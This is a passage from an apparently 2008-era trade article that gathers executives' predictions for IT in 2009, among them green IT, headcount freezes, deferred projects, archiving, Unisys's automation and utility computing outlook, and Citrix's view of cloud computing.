2. Going beyond a pragmatic green approach: The increasing cost of power, lack of available data centre space and imminent Carbon Trading Scheme will put increased pressure on organisations to implement tangible Green IT strategies. While most organisations have adopted a pragmatic green approach to date, Government departments will lead the Green IT agenda in 2009 by implementing best practices that deliver benefits for the environment and the bottom-line. Financial organisations will quickly follow suit.

3. Feeling the skills squeeze: Organisations will shed or freeze headcount in their IT departments, making easy-to-use technologies that allow IT professionals to do more with less paramount. With the economic downturn comes the greater availability of highly skilled IT staff. Progressive organisations will use this to their advantage to make hires in 2009 that will position the company for growth in the future.

4. Deciding to defer, defer, defer: Deferring IT projects will become the norm in 2009 as the economic downturn worsens. Technologies like thin provisioning and storage virtualisation will continue to grow in popularity as organisations turn to technology to get more juice out of their existing infrastructure and defer future IT investments until tough times improve. Progressive organisations will use 2009 as a time to get their house in order and implement IT projects that deliver a measurable ROI.

5. Introducing annoying archiving: Data archiving will become sufficiently annoying, especially in large organisations, as the growth of unstructured data continues to escalate. In 2009, organisations will start to view archiving as a strategic rather than tactical activity that unlocks the value of information to the entire organisation. Active archiving solutions will become more integral to an organisation's information management initiatives, and many organisations will move their tier two storage to this archival tier.

David Barnes
Managing director
Unisys Australia & New Zealand

Australian organisations will look to their IT departments as the global economy tightens to help adapt quickly to changing market conditions by stabilising internal processes, delivering greater efficiency and enhancing cost management.

The five areas of technology that Unisys predicts will drive IT strategy in 2009 are:

1. Automation: Automation tools will allow IT infrastructure to quickly and automatically respond to changing business demands based on pre-determined rules.

2. On-demand service delivery: Utility computing models will experience a greater take-up in 2009 as businesses look to pay only for what they use.

3. Centralised IT infrastructure: Knowledge management and modelling methodologies will be used to track interdependencies across an organisation so that management can take a whole of company view of all facets of their organisation and provide an equitable service for all employees whilst removing unused applications.

4. Better asset management: Under-utilised IT resources will become a large focus for companies looking to identify wasted resources and improve organisational efficiencies.

5. Being green an added benefit only: Solutions that help organisations meet their green commitments will only be an added benefit in 2009, not a primary decision driver, as businesses look to protect their bottom line first and foremost.

Dr Michael Harries
Director of technology strategy
Citrix Systems

1. Everyone's heads will be in the clouds: With increased interest in cloud computing, enterprises will start looking to leverage the benefits of the cloud. But this is not an all or nothing move: while everyone's heads will be in the cloud, their feet will still firmly be planted on the ground. The cloud brings new IT capabilities to the IT toolbox and should be treated as just part of the enterprise IT architecture strategy.

IDC's Predictions for 2009
Analyst firm IDC predicts current economic crisis will still provide for pockets of opportunities within the Asia-Pacific

Despite the global economic slow down, IDC believes that in